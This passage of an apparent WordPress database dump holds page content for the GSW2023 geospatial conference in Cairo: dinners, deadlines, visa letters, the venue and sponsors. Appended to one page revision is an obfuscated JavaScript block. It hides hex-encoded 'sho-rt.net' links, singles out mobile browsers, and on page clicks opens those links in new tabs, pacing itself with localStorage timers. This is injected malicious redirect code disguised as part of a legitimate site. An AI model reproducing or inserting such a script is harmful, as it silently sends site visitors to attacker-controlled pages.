tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:28:40','2023-08-08 15:28:40','',3066,'https://gsw2023.com/?p=5089',0,'revision','',0),
(5090,1,'2023-08-13 03:41:39','2023-08-13 03:41:39','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 